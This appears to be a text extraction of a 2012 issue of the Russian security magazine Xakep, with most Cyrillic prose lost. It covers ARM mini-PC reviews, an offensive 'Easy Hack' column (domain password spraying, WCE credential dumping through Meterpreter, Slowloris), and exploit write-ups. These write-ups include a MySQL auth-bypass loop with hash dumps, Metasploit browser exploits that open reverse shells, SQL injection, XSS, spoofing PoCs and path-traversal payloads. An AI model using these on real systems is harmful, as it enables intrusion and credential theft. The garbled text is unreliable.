Linux, OMAP4. , Ubuntu.
Linux (
), SD-.
Ubuntu OMAP4: cdimage.ubuntu.com/releases/11.10/release/
ubuntu-11.10-preinstalled-desktop-armel+omap4.img.gz.
SD-. SD-,
:
$ df -h

PandaBoard ,
.
Texas Instruments (). ,
, ,
. PandaBoard
,
. ,
PandaBoard -,

.

PandaBoard TI OMAP
4460 ( PandaBoard ES, PandaBoard 4430) ARM Cortex-A9.
1,2 , 1 ,
SD-.
PowerVR SGX540. OpenGL ES 2.0,
OpenGL ES 1.1, OpenVG 1.1 EGL 1.3.
? , ,
WiLinkTM 6.0,
Wi-Fi (802.11 b/g/n) Bluetooth,
Ethernet 10/100, RTC ( ), HDMI DVI-D, USB 2.0,
. 82
, 114,3101,6 .

RS-232 ( ,
,
- , )
. , BeadaFrame
7" LCD (BeadaFrame 7" LCD display kit),
TFT- 7 800480, ,
(RTC
time keeper) .


- ,


Linux Android.

182$
goo.gl/8fWYF

- :
Filesystem
/dev/sda5
none
none
none
none
/dev/sdb2

Size
100G
995M
1002M
1002M
1002M
16G

Used
8.0G
700K
308K
104K
0
0G

Avail
Use% Mounted on
92G
8% /
995M
1% /dev
1001M
1% /dev/shm
1002M
1% /var/run
1002M
0% /var/lock
16G
0% /media/ 097afede571b-32c4-8612-3364f0655f52

, SD- /dev/sdb2. :
$ sudo umount /dev/sdb2
SD-:
$ gunzip -c ubuntu-11.10-preinstalled-server-armel+omap4.img.gz \
| sudo dd bs=4M of=/dev/sdb
$ sync
PandaBoard COM-
. , USB2COM (USB
to Serial). PandaBoard ( ):
$ TERM=vt100 minicom -s
minicom /dev/ttyUSB0,
USB2COM. ,
PandaBoard, $ dmesg | grep tty.
,
, Ubuntu .
Ubuntu .
PandaBoard /etc/apt/sources.list
sudo vim /etc/apt/sources.list
,
Universe Multiverse. :
$
$
$
$

sudo
sudo
sudo
sudo

apt-get install python-software-properties


add-apt-repository ppa:tiomap-dev/release
apt-get update
apt-get install ubuntu-omap4-extras

PandaBoard:
$ sudo reboot

08 /163/ 2012

041

PC ZONE

TRIM-SLICE
Trim-Slice
,
CompuLab. -.

Trim-Slice
. (9,5131,5 ),
, .


NVIDIA Tegra 2. ARM-
1 1,2 .
Trim-Slice : SSD SATA 32 (-,
SSD-), SD- SD- , 1 DDR2-800,
HDMI DVI, 5.1, 4 USB- 2.0,
Ethernet- 10/100/1000, Wi-Fi 80.211n, RS-232.
,
( USB-, RS-232, Wi-Fi Ethernet), ( SSD SD- ),
. USB-.

, Trim-Slice , .

Ubuntu.

ALLWINNER A10
ZERO DEVICES Z802

74$

, .

- .
-
AlLWinner A10 ZERO Devices Z802
, ,
.
ZERO Devices.
2
. .
ZERO Devices Z802: tinyurl.com/7gjzj6y.

AllWinner A10 , Raspberry Pi:


ARM Cortex-A8 1,5 . 512 ,
Mali-400, HDMI-, USB microUSB, SD- ( SD- 32 ), Wi-Fi 802.11 b/g.
AllWinner ,
Full HD. .

- Android Ice Cream


Sandwich. ARM- , Linux.

338$
trimslice.com

- ARM,
, . - ANDROID
LINUX.
042

Amlogic AML8726 ARM Cortex A9 (65 ),


800 , L2 128 , Mali-400 GPU
250 M, 1080P.
Rockchip RK2918 ARM Cortex A8 (55 ),
1,2 , 1 , L2
512 , GC800 GPU 600 M,
1080P.
Allwinner A10 ARM Cortex A8 (55 ), 1,5 ( ~11,2 ), L2
512 , Mali-400 GPU 300 M,
2160P.
Amlogic, Cortex A9.
( 800 ) .

08 /163/ 2012

- -

Raspberry Pi

Cotton Candy

CuBox

PandaBoard

Trim-Slice

AllWinner A10

Raspberry Pi
Foundation,

FXI Technologies,

SolidRun Ltd.,

Texas Instruments,

CompuLab,

AllWinner Technology
Co. Ltd.,

35 $

199 $

99

182 $

213338 $

74 $

Debian, Ubuntu,
Fedora

Android 4.0 Ice Cream


Sandwich

Ubuntu,
Android

, Linux, Android,
QNZ, RiscOS

Ubuntu

Android 4.0 Ice Cream


Sandwich

Broadcom
BCM2835, 700

Samsung Exynos 4210,


1,2

Marvell Armada 510


ARMv7, 800

TI OMAP 4460 ARM


Cortex-A9, 1,2

NVIDIA Tegra 2, 1,2

ARM Cortex-A8, 1,5

256

1 DRAM

1 DDR3 800

1 DDR2

1 DDR2-800

512 DDR2

Mali-400 MP

Vivante GC600 Marvell


vMeta HD Video
Decoder

PowerVR SGX540

NVIDIA GeForce GPU

Mali-400

USB 2.0 x 2*
HDMI x 1
RCA x 1

USB 2.0 x 1
microUSB x 1
HDMI x 1

HDMI x 1
S/PDIF x 1
USB 2.0 x 1
eSATA x 1
irDA x 1
microUSB x 1

HDMI x 1
DVI x 1
Audio In/Out
USB x 3
RS 232

HDMI x 1
DVI x 1
USB 2.0 x 4
S/PDIF 5.1 x 1
Stereo line-out / line-in

HDMI x 1
USB 2.0 x 1
microUSB x 1
SATA x 1

SD, MMC SD

microSD

microSD, eSATA

SD, MMC SD

SD, SSD, SATA

Micro TF 2-32GB

Wi-Fi 802.11 b/g/n


Bluetooth
100baseT Ethernet

1000baseT Ethernet
Bluetooth
Wi-Fi 80.211n
RS-232

100baseT Ethernet
Wi-Fi 802.11 b/g

26

2,757,8

Ethernet

Wi-Fi 802.11b/g/n
Bluetooth

1000baseT Ethernet


* 2 B, A

08 /163/ 2012

043

/ EASY HACK

GreenDog , Digital Security (twitter.com/antyurin)

EASY
HACK

INFO



.

SSL

SSL ,
.
, . ,
.
.
Easy Hack, ,
SSL ( HTTPS), .
, SSL - ,
, . SSL
2.0. ,
man-in-the-middle.
/ ( , ).
, ,
.
- SSL v2.0. , , BEAST-. ,
RC4.
, :).
,
MITM-,
. SSL, , (),
- .
. -,
,
. -,
,
.
:).
, - , , .
, , . , Java

044

SSL, . ,
, . !
FTPS, POP3S. , ,
, - ,

SSL Chrome

08 /163/ 2012

.
.
.
?.
, . Gremwell (www.gremwell.com)
sslcaudit (goo.gl/6vwuC),
SSL-.
,
.
, , . .
:
git clone -b release_1_0 https://github.com/grwl/sslcaudit.git
sudo apt-get install python-m2crypto

Python M2Crypto (goo.gl/nCw8W).


:

- ,
HTTPS, https://ssltest.
offenseindepth.com. .
( sslcaudit), SSL-
Wireshark. ,
ncat, ,
SSL.

./sslcaudit
ncat -l -p 4343 --ssl

8443.
, . goo.gl/EKSWl.


SSL v2.0.

, - .
, .
, , - ,
: - , . , , .
,
. ,
.
,
, . , , ,
-
. : _.
,
. ,
,
.
, , SMB- PDF.

.
, NULL session, Cain, , SID (. ),
.
, . .
: ,
. , (, ):
net accounts /domain

, , .

08 /163/ 2012

.
, , - :).
. -

.
, . commandlinekunfu LaNMaSteR53:
@FOR /F %n in (names.txt) DO @FOR /F %p in (passwords.txt)
DO @net use \\DC01 /user:mydomain\%n %p 1>NUL 2>&1 &&
@echo [*] %n:%p && @net use /delete \\DC01\IPC$ > NUL

IPC$ .
, .
. LaNMaSteR53
. , - ,
1000 , ,
.

045

/ EASY HACK
. , ,
Cain
.
LaNMaSteR53
, ,
. :
Login1:Password1
Login1:Password2
Login1:Password3
Login2:Password4
Login2:Password5
Login2:Password6

LaNMaSteR
. , 2000 .
-,
:
cmd /v:on /c "set /a usercount=0 >NUL & for /F %u in
(users.txt) do @set
/a passcount=0 >NUL & set /a lpass=!usercount!*4 >NUL &
set /a upass=!usercount!*4+4
>NUL & @(for /F %p in (passwords.txt) do @(IF !passcount!
GEQ !lpass! (IF !passcount!
LSS !upass! (@net use \\DC01 /user:mydomain\%u %p 1>NUL

SID

2>&1 && @echo This works


%u/%p && @net use /delete \\DC01\IPC$ > NUL))) & set /a
passcount=!passcount!+1 >NUL)
& set /a usercount=!usercount!+1 >NUL"

!
login: Alphanetworks
password: wrgg19_c_dlwbr_dir300

DNS

: - !
DNS-
SQL-.
sqlmap.
SQL-
OWASP. - ,
, c Sony
Anonymous , ,
? :)
, SQL- ,


. ,
, ... , , , -
.
DNS tunneling
, , . ,
, ,

, - ,
.
, - , DNS-,
. , ,
( ) DNS-.
,
, DNS-. . , , , DMZ

046

SQL-, DNS

. ( ?)
DNS-. , ,
( , DNS?). ,
DMZ ,
DNS-. , ,
DNS-,

08 /163/ 2012

. , DNS,
, -
.
, .
- ( ) .
DNS-,
(
).
DNS-
.
,
. ,
:).
, DNS . Corelan - download&execute
DNS, Metasploit. ,
Meterpreter
. - -
DNS
SQL-. !
, DNS- , blind,
.

sqlmap

, , sqlmap (goo.gl/xl4Hv),
.
,
. - ,
.

DoS, , : , . -
, (, DEP
ASLR) remote code execution
DoS. --, -
. DoS/DDoS-.
. DoS = = .
, DoS -
, , -
. , , ,
100 000 , .
, , , HTTP.
, - , . :). HTTP-
,
.
Slowloris (goo.gl/tbe81). (Robert RSnake Hansen) 2009 ,
. HTTP- -,
, , . ,
- HTTP- ,
. , - ,
-. , ,
. ,
. , .

08 /163/ 2012

-,
HTTP-.
, .
, , , -
Apache.
Slowloris . -, ,
. -, , , .
, , -
, .
, - .
, Slowloris ,

Slowloris defcon-russia.ru

047

/ EASY HACK
. , . - -,
, RDP
, , RDP :).
, . Slowloris,
Perl CPAN, .
, , -
Windows Slowloris .

BACKTRACK 5

. Offensive Security
BackTrack. . BackTrack

,
METERPRETER

Easy Hack - ,
-, . , Metasploit.
-- Meterpreter.
, :).
, Meterpreter
exe.
, !
,
- ,
, meterpreter . !
- ,
(- SMBRelay, Pass the Hash),
.
, , ,
:).
-, Meterpreter , ( incognito) ,
,
. , ,
NTLM- ,
- . WCE.
, , mimikatz.
. , ,
Meterpreter.
,
exe - .
-. .
(

048

1. Perl:
perl -MCPAN -e 'install IO::Socket::INET'
perl -MCPAN -e 'install IO::Socket::SSL'
2. :
perl slowloris.pl -dns victim.com

, ,
GET ( ), HEAD,
POST, HTTPS.
-, ,
, .

Ubuntu, ,
, apt-get.
BackTrack
5 R2 goo.gl/1Jlwa. .

meterpreter). , ,
?
meterpreter forensic. .
. ,
.
meterpreter .
.
, WCE,
meterpreter-:
execute -H -m -d calc.exe -f wce.exe -a "-o creds.txt"

execute , -;
-H ;
-m , ;
-d dummy-exe,
;
-f exe -,
;
-a "-o creds.txt" .
,
. ,
, .
Meterpreter, , , dummy-exe.
,
exe .
:).
. ,
dummy-.
. !

08 /163/ 2012

(ivinside.blogspot.com)


.
.

MySQL/MariaDB

CVSSV2

7.5
(AV:N/AC:L/AU:N/C:P/I:P/A:P))

BRIEF
MariaDB
CVE-2012-2122 MySQL
MariaDB. ,

( root,
) .
EXPLOIT
,
MariaDB/MySQL. ,
(SHA ),
, .
,
.
memcmp() :
typedef char my_bool;
...
my_bool check(...) {
return memcmp(...);
}
, check() char,
memcmp() int. int char,
, int. ,
memcmp() , , 0x100 -

050

, char . ,
. memcmp()
, , .
Accuvant Labs (pastie.org/4064638), memcmp()
.
,
MySQL/MariaDB.

1/256,
:
$ for i in 'seq 1 1000'; do mysql -u root --password=bad \
-h 127.0.0.1 2>/dev/null; done

MySQL, .
Pwnie Express
Metasploit,
.
:
$ msfconsole
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(mysql_authbypass_hashdump) > set USERNAME root
msf auxiliary(mysql_authbypass_hashdump) >
set RHOSTS 127.0.0.1
msf auxiliary(mysql_authbypass_hashdump) > run
[+] 127.0.0.1:3306 The server allows logins, proceeding
with bypass test
[*] 127.0.0.1:3306 Authentication bypass is 10% complete
[*] 127.0.0.1:3306 Authentication bypass is 20% complete
[*] 127.0.0.1:3306 Successfully bypassed authentication
after 205 attempts

08 /163/ 2012

[+] 127.0.0.1:3306 Successful exploited the authentication


bypass flaw, dumping hashes...
[+] 127.0.0.1:3306 Saving HashString as Loot:
root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot:
root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot:
root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot:
root:*C8998584D8AA12421F29BB41132A288CD6829A6D
[+] 127.0.0.1:3306 Saving HashString as Loot:
debian-sys-maint:*C59FFB311C358B4EFD4F0B82D9A03CBD77DC7C89
[*] 127.0.0.1:3306 Hash Table has been saved:
20120611013537_default_127.0.0.1_mysql.hashes_889573.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

handling. This exception may be expected and handled.

0:000> u eip
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c mov
eax,dword ptr [edx+2Ch]
104b1b30 53
push
ebx
104b1b31 ffd0
call
eax

TARGETS
MariaDB MySQL 5.1.61, 5.2.11, 5.3.5, 5.5.22 : Ubuntu Linux 64-bit (10.04, 10.10, 11.04, 11.10, 12.04),

,
Metasploit, Internet
Explorer 6/7/8 Windows XP SP3:

eax=02dbac01 ebx=0013e2e4 ecx=02dbac10


edx=44444444 esi=02dbac11 edi=00000000
eip=104b1b2d esp=0013e2bc ebp=0013e2c8 iopl=0
nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00050202
Flash32_11_2_202_228!DllUnregisterServer+0x300e84:
104b1b2d 8b422c mov
eax,dword ptr [edx+2Ch]
ds:0023:44444470=????????

openSUSE 12.1 64-bit, Debian Unstable 64-bit, Fedora 16, Arch Linux.
SOLUTION
. ,
MySQL .
my.cnf [mysqld] bind-address 127.0.0.1,
.

Adobe
Flash Player

CVSSV2

10.0
(AV:N/AC:L/AU:N/C:/I:/A:)

BRIEF
Adobe Flash Player, ,
. .
Word Flash (SWF) .
.
EXPLOIT
Metasploit , . .
SWFs spray,

.
, AMF (Action Message Format) RTMP (Real Time Messaging
Protocol). RTMP
,
- .
(, )
- , RTMP-
. Flash Media Server,
systemMemoryCall(),
.
, PCAP-,
RTMP-.
,
systemMemoryCall(). , Abode
Flash Player :
(348.540): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception

08 /163/ 2012

msf
msf
[*]
[*]
[*]
[*]
[*]
msf
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[*]
[+]
[+]

> use exploit/windows/browser/adobe_flash_rtmp


exploit(adobe_flash_rtmp) > exploit
Exploit running as background job.
Started reverse handler on 192.168.1.157:4444
Using URL: http://0.0.0.0:8080/Sgs7eu3zjBo0
Local IP: http://192.168.1.157:8080/Sgs7eu3zjBo0
Server started.
exploit(adobe_flash_rtmp) >
192.168.1.158
adobe_flash_rtmp - Client requesting:
/Sgs7eu3zjBo0
192.168.1.158
adobe_flash_rtmp - Using msvcrt ROP
192.168.1.158
adobe_flash_rtmp - Sending html
192.168.1.158
adobe_flash_rtmp - Client requesting:
/Sgs7eu3zjBo0/BnKXAzRw.swf
192.168.1.158
adobe_flash_rtmp - Sending Exploit SWF
192.168.1.158
adobe_flash_rtmp - Connected to RTMP
Sending stage (752128 bytes) to 192.168.1.158
Meterpreter session 1 opened (192.168.1.157:4444 ->
192.168.1.158:1840) at 2012-06-22 11:11:16 +0200
Session ID 1 (192.168.1.157:4444 -> 192.168.1.158:
1840) processing InitialAutoRunScript 'migrate -f'
Current server process: iexplore.exe (2284)
Spawning notepad.exe process to migrate to
Migrating to 3904
Successfully migrated to process

TARGETS
Adobe Flash Player 11.2.202.233
Windows, Macintosh Linux, Adobe Flash Player 11.1.115.7
Android 4.x Adobe Flash Player 11.1.111.8 Android 3.x 2.x.
SOLUTION
Adobe Flash Player .

Microsoft
XML Core Services

CVSSV2

10.0
(AV:N/AC:L/AU:N/C:/I:/A:)

BRIEF

, Internet Explorer

051

/
Microsoft Office.
IM, , .
MSXML
,
.
EXPLOIT
get_definition() XML Node. ,
Internet Explorer, :
<object
classid="clsid:6D90f11-9c73-11d3-b32e-00C04f990bb4"
id="xx">
</object>
<script>
document.getElementById("xx").object.definition(0);
</script>
,
,
_dispatchImpl :: InvokeHelper().

Metasploit, :
msf > use exploit/windows/browser/msxml_get_definition_code_
exec
msf exploit(msxml_get_definition_code_exec) > set payload
windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(msxml_get_definition_code_exec) > set lhost
10.0.1.3
lhost => 10.0.1.3
msf exploit(msxml_get_definition_code_exec) > exploit
[*] Exploit running as background job.
[*]
[*]
msf
[*]
[*]
[*]
[*]
[*]
[*]
[*]

Started reverse handler on 10.0.1.3:4444


Using URL: http://0.0.0.0:8080/xtQdbEC7QDIb
exploit(msxml_get_definition_code_exec) >
Local IP: http://10.0.1.3:8080/xtQdbEC7QDIb
Server started.
10.0.1.79
msxml_get_definition_code_exec - Using
msvcrt ROP
10.0.1.79
msxml_get_definition_code_exec 10.0.1.79:1564 - Sending html
Sending stage (752128 bytes) to 10.0.1.79
Meterpreter session 2 opened (10.0.1.3:4444 ->
10.0.1.79:1565) at 2012-06-18 14:07:38 -0500
Session ID 2 (10.0.1.3:4444 -> 10.0.1.79:1565)
processing InitialAutoRunScript 'migrate -f'

, memcmp()

[*]
[*]
[+]
[+]

Current server process: iexplore.exe (2856)


Spawning notepad.exe process to migrate to
Migrating to 2356
Successfully migrated to process

TARGETS
Metasploit IE6/7/8/9, Windows XP, Vista
Windows 7 SP1.
SOLUTION
.

ActiveX MSXML
Internet Explorer Microsoft Office.
, Microsoft Microsoft
Fix it 50897.

Internet
Explorer

CVSSV2

10.0

(AV:N/AC:L/Au:N/C:/I:/A:)
BRIEF
Microsoft Internet Explorer
,
.
Same ID Property Remote Code Execution Vulnerability.
Dark Son Yichong Lin.
Metasploit Juan Vazquez.
CVE-2012-1875.

IE

052

EXPLOIT
- (ROP) DEP ASLR.

08 /163/ 2012

Java, msvcr71.dll
ASLR, , Internet Explorer .

Metasploit.
( ):
msf > use exploit/windows/browser/ms12_037_same_id
msf exploit(ms12_037_same_id) > set payload windows/
meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms12_037_same_id) > set lhost 10.0.1.3
lhost => 10.0.1.3
msf exploit(ms12_037_same_id) > exploit
[*] Exploit running as background job.
[*] Started reverse handler on 10.0.1.3:4444
[*] Using URL: http://0.0.0.0:8080/gTHJEKBboMi
[*] Local IP: http://10.0.1.3:8080/gTHJEKBboMi
[*] Server started.
msf exploit(ms12_037_same_id) >
[*] 10.0.1.79
ms12_037_same_id - Client
requesting: /gTHJEKBboMi
[*] 10.0.1.79
ms12_037_same_id - Using msvcrt ROP
[*] 10.0.1.79
ms12_037_same_id - Sending html
[*] Sending stage (752128 bytes) to 10.0.1.79
[*] Meterpreter session 1 opened (10.0.1.3:4444 ->
10.0.1.79:1685) at 2012-06-18 13:42:49 -0500
[*] Session ID 1 (10.0.1.3:4444 -> 10.0.1.79:1685)
processing InitialAutoRunScript 'migrate -f'
[*] Current server process: iexplore.exe (3916)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 1680
[+] Successfully migrated to process
TARGETS
Metasploit Internet Explorer 8 Windows XP
SP3 7 SP1, , in the wild,
Windows, Windows Vista
Windows 7.

, RTMP-

SOLUTION
Microsoft.

iBoutique
eCommerce v4.0

CVSSV2

7.5

(AV:N/AC:L/Au:N/C:P/I:P/A:P)
BRIEF
Vulnerability Laboratory Research , -
iBoutique CMS v4.0.
EXPLOIT
1. iBoutique v4.0 SQL-, SQL-
.
.
OrderNumber index.
php, :
SQL_ERROR
select * from websiteadmin_orders WHERE OrderNumber=
254' AND UserName='hack'
You have an error in your SQL syntax;
check the manual that corresponds to your MySQL
server version for the right syntax to use near 'AND
UserName='hack' at line 1
Details for order #254'
:
http://127.0.0.1:1338/iboutique/index.php?page=en_Orders
&OrderNumber=258'+/*!Union*/+/*!SelEct*/+1,2,3,4,version(
),6,7,8,9,10--%202. ,
.
, my area my profile edit profile (first name, last name, email, state,
address ) HTML-, <iframe
src=www.vuln-lab.com onload=alert("VL")/>.
,
.
TARGETS
iBoutique eCommerce v4.0 , , .
SOLUTION
. z

ROP, CVE-2012-1875

08 /163/ 2012

053

Sanjar Satsura (satsura@r00tw0rm.com, twitter.com/sanjar_satsura)

INTRO
,
.
: ,
.
. , ,
. , spoof-
,
, . , :
(post-exploitation).

, ,
, ,
-
. , -,
, , ,
-,
. ,
.

054


spoofing
, .
,
old school spoofing
.
, , .
, , ,
, . , ,
,
(
). ,
. , DNS: , , (][_#5_2012)

DNS-

08 /163/ 2012

UDP (, TCP/IP, , ) .


(local) (net).
.
,
,
,
. , , . , ,
. .
1. Spoofing TCP/IP & UDP . - TCP
UDP :
IP spoofing IP- source IP-.
, , ,
;
ARP spoofing Ethernet-,
. ARP;
DNS Cache Poisoning DNS- ;
NetBIOS/NBNS spoofing
Microsoft.
2. Referrer spoofing .
3. Poisoning of file-sharing networks
.
4. Caller ID spoofing VoIP
5. E-mail address spoofing e-mail .
6. GPS Spoofing
GPS-.
7. Voice Mail spoofing
.
8. SMS spoofing ,
SMS-.


.
.
,
,
. , .


EXTENSION SPOOFING
,
Zhitao
Zhou. 0x202E (RLO) ,

Windows (explorer.exe).
:

Super music uploaded by 3pm.SCR

3pm.SCR , , (
. . ). 3pm.
SRC 0x202E (. . 1),
Windows :
Super music uploaded by RCS.mp3


(Restorator, Resource Hacker).
,
, . ,
,
. C#,
, 0x202E:
Public Sub U_202E(fi le As String, extension As String)
Dim d As Integer = file.Length - 4
Dim u As Char = ChrW(823)
Dim t As Char() = extension.ToCharArray()
Array.Reverse(t)
Dim dest As String = fi le.Substring(0, d) & u &
New String(t) & fi le.Substring(d)
System.IO.File.Move(file, dest)
End Sub

FILE NAME SPOOFING


Yosuke Hasegawa Security-Momiji.
(ZERO WIDTH
Characters),
(. . 2). :
U+200B (ZERO WIDTH SPACE)

IDN-
IDN- 2001
. , , 2005
ShmooCon.
pypal.com (xn--pypal-4ve.com Punycode),
. Slashdot.org
, ,
.
UTF

08 /163/ 2012

055

U+200C (ZERO WIDTH NON-JOINER)


U+200D (ZERO WIDTH JOINER)
U+FEFF (ZERO WIDTH NO-BREAK SPACE)
U+202A (LEFT-TO-RIGHT EMBEDDING)

UTF
.
.
, . , TrojanDropper:Win32/Vundo.L (
vk.com, vkontakte.ru, *odnoklassniki.ru)
.
%SystemRoot%\system32\drivers\etc\hosts
- hosts UTF- (0043E), hosts
:
92.38.66.111
92.38.66.111
92.38.66.111

odnoklassniki.ru
vk.com
vkontakte.ru

? !

RLO Charmap

-
STATUS BAR / LINK SPOOF

(<a href=''>). , ,
, .
JavaScript- . , iamjuza,
PoC
,
. , ,

. Proof-of-Concept
1337day.com. :

this.href=": <a href="http://www.google.com/"


onclick="this.href='http://xakep.ru'">Click me!</a><br />
location.reload='': <a href="http://www.google.
com/" onclick="location.reload='http://www.xakep.ru';
return false;">Click me!</a><br />
location.replace(''): <a href="http://www.google.
com/" onclick="location.replace('http://www.xakep.ru');
return false;">Click me!</a><br />
location.assign(''): <a href="http://www.google.
com/" onclick="location.assign('http://www.xakep.ru');
return false;">Click me!</a><br />
window.location.assign(''): <a href="http://www.
google.com/" onclick="window.location.assign('http://

www.xakep.ru'); return false;">Click me!</a><br />


window.location.replace(''): <a href="
http://www.google.com/" onclick="window.location.
replace('http://www.xakep.ru'); return false;">
Click me!</a><br />
window.location.href='': <a href="http://www.
google.com/" onclick="window.location.href=
'http://xakep.ru'; return false;">Click me!</a><br />

HTML- (www.google.com) ][ (www.


xakep.ru) ,
JavaScript- onclick=''.
URL BAR SPOOFING

,
.
CVE-2011-1452,
Google Chrome 11.0.696.57:

<html><head>
<meta http-equiv="Content-Type"
content="text/html; charset=ISO-8859-1"></head>
<body>
<a href="javascript:spoof();">Click Me</a>
<script>
var a=null;
function spoof() {
a = window.open('./spoofing.php')

WARNING

FLAMER MICROSOFT
Microsoft Security Advisory (2718704) Unauthorized Digital
Certificates Could Allow Spoofing.

Flamer: -
,
- .

056


, MITM-,

.
- Security Advisory #2718704
High.


.
,


,

.

08 /163/ 2012

hosts

window.setTimeout("a.history.back()", 4500);
window.setTimeout("a.location.href='./spoofing.php'", 5000);
}
</script>
</body></html>

Click Me spoof(),
:
(spoofing.php) a;
4500 (4,5 ) ( window.
setTimeout) ,
a.history.back(),
;
5000
location spoofing.php, .
URL .
CVE-2010-4045 (Opera <= 10.62):
057

<html><head>
<meta http-equiv="Content-Type"

08 /163/ 2012

057


content="text/html; charset=ISO-8859-1">
</head><body>
<h1>Proof of Concept - OPERA High Location Bar Spoofing</h1>
<br><img onclick="location.reload();setTimeout(stop();
location.href='http://google.com', 0500)" src="click.png">
</body></html>

,
(<img>), (location.reload()),
.
0-day Safari iOS 5.1:
<body>
<fieldset>
<legend>Some payment/bank website included here.
</legend>
<ol>
<li>start poc<xmp>click the button to run the poc.
</xmp><button id="one">Demo</button></li>
</ol>
</fieldset>
<script type="text/javascript">
document.getElementById('one').onclick = function()
{
myWindow=window.open('http://www.apple.com',
'eintitel','width=200,height=100,location=yes');
myWindow.document.write("<html><head></head>
<body><strong>This is fishing page.</strong>
<br><br><iframe src=\"http://www.apple.com\");>
</iframe></scri+pt></body></html>");
myWindow.focus();
return false;
}
</script>
<br><br><br>
<iframe id="ifR1" name="ifR1"width="100px"
height="50px" src="http://www.apple.com"></iframe>
</body>

<p>Can you view my source from Chrome?</p>


</body></html>
source.html[%20%2E]
You can, but not that easily...


RLO (. . 4).
source.html
source.html%20%2E.
, ,
. ,
, .
IDN CLONES ,

,
DNS, IDN
(Internationalized Domain Names )
. -
:
1. , .
( l 1, O 0), (rn m, cl d).
2. -, .
3. ( ,
, Twitter, iframe, ).
4. :).

SOURCE CODE SPOOFING



UTF-8 0x202E (RLO). Virginia Tech (John Kurlak).
JavaScript History.replaceState(),

. Proof-of-Concept (source.html):

, , -
: .
IDN- 2005
, , IDN. , .org

. .
IDN
. xn
,
. ,
IDN.
IDN-
.
punycode- IDN-,
. , , ;-). (src/exploits/link_spoof.py).

<html><head><title>Source</title>
<meta charset="UTF-8">
<script type="text/javascript">
history.replaceState(null, null,
'source.html' + String.fromCharCode(8237));
</script></head><body>

,
. , .
.
? :). z

Demo
myWindow ,
apple.com 200100,
Safari . myWindow HTML (JavaScript/VB/etc)
document.write().
Safari myWindow.

, ,
;-).

058

08 /163/ 2012

, Positive Technologies (sscherbel@ptsecurity.ru)


PHP

PHP

PHP-

.


,
.
?
PHP.
,
.
PHP , , .
.
:
1. PHP- ( ,
C-);
2. C- .
PHP Roadsend PHP, Phalanger,
Quercus on Resin, HipHop for PHP. ,
.

08 /163/ 2012

PHP
Roadsend PHP
Roadsend PHP , , -,
MicroServer. PHP- . -
- .
-
Apache, lighttpd, nginx,
- CGI
FastCGI.

059

.1. /etc/passwd

Phalanger
Phalanger , ,
PHP, ,
. PHP-
.NET-,
-,
PHP. Phalanger -
IIS, , PHP.

Quercus on Resin
- Resin.
Resin -
Java, PHP,
Quercus. Resin Professional
Open Source. Professional PHP-
- Java, Open Source PHP-
.

HipHop for PHP


HipHop, Facebook. HipHop
PHP- C++, ,
g++, . ,
, HipHop, 30 .
-:
,
. ,
Roadsend PHP,
- CGI FastCGI. , ,
. :
1. (Local File Inclusion)
,
;
2. , ,
.


,
,
PHP. , ?

?

060

.2. 500 Quercus

,
. ,
:

- ,
-;
,
HTTP Parameter Pollution HTTP Parameter Contamination,
;
;
, PHP.


Roadsend PHP, , MicroServer. ,
Path Traversal. .
Path Traversal Roadsend PHP
http://host/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc
%2fpasswd

,
, URL-.
(. . 1). :
Path Traversal
http://host//etc/passwd

Roadsend PHP ,
, , .
.


, - : -





08 /163/ 2012

PHP

.5.

, -
. HTTP Parameter
Contamination.
,
client-side . . 1 PHP
LAMP. , PHP.
Phalanger Quercus. , ,
500 (. fingerprint . 2).
,
null-byte,
(. ), ,
.
, Local File Inclusion
foreach($_GET["language"]
as $langDir => $langFile)
{
include($langDir."/".$langFile.".php");
}

, . null-byte , .
/etc/passwd
http://host/index.php?language["/etc/passwd%00"]=1

.4. $_SERVER["DOCUMENT_ROOT"]



-. PHP register_globals,
5.4.0 . ,
PHP , . Quercus
register_globals (
), POST ,
. , ,
POST, _SERVER. . 3
_SERVER["REMOTE_
ADDR"], , ,
IP-.

$_SERVER["DOCUMENT_ROOT"], , Local File Inclusion (. . 4).
, PHP (.
) ,
.
$_SERVER["DOCUMENT_ROOT"]
<?php
include($_SERVER["DOCUMENT_ROOT"]."header.php");
?>

advisory: bit.ly/MFeJYu.
.
, _SESSION :
.

LAMP

test.php?=

Array
(
)

test.php?[]=

Array
(
)

Array
(
[a] => Array
test.php?a[][= (
[0] =>
)
)
.3. _SERVER

08 /163/ 2012

IIS 7.5 +
Phalanger 3.0
Array
(
[] =>
)
Array
(
[[]] =>
)

Error 500

HipHop
Array
(
)
Array
(
)
Array
(
[a] => Array
(
[0] =>
)
)

Quercus on
Resin <= 4.0.26
Array
(
[] =>
)
Array
(
[0] =>
)

Error 500

1.

061


0 ,
PHP. ,
.


, PHP . , disable_functions,
( , , shell-),
open_basedir,
. .
disable_functions
shell-
disable_functions: system, exec, shell_exec, passthru,
popen, proc_open, pcntl_exec

.6 Null-byte

, , _SESSION, .


PHP , (

false). ,
PHP (bit.ly/LQsvHh).
. PHP
. , ,
.

// script 1
<?php
$xArray = array(TRUE, FALSE, 1, 0, -1, "1", "0", "-1",
NULL, array(), "php", "");
foreach($xArray as $x) {
if($x == array()) { echo("TRUE"); }
else { echo("FALSE"); }
echo("<br>");
}
?>
// script 2
<?php
$xArray = array(TRUE, FALSE, 1, 0, -1, "1", "0", "-1",
NULL, array(), "php", "");
foreach($xArray as $x) {
if(array() == $x) { echo("TRUE"); }
else {
echo("FALSE"); }
echo("<br>");
}
?>


, , , . , . , .
3, Quercus
,
PHP. , array()

062

, shell- .NET, . .
shell- .NET
<?php
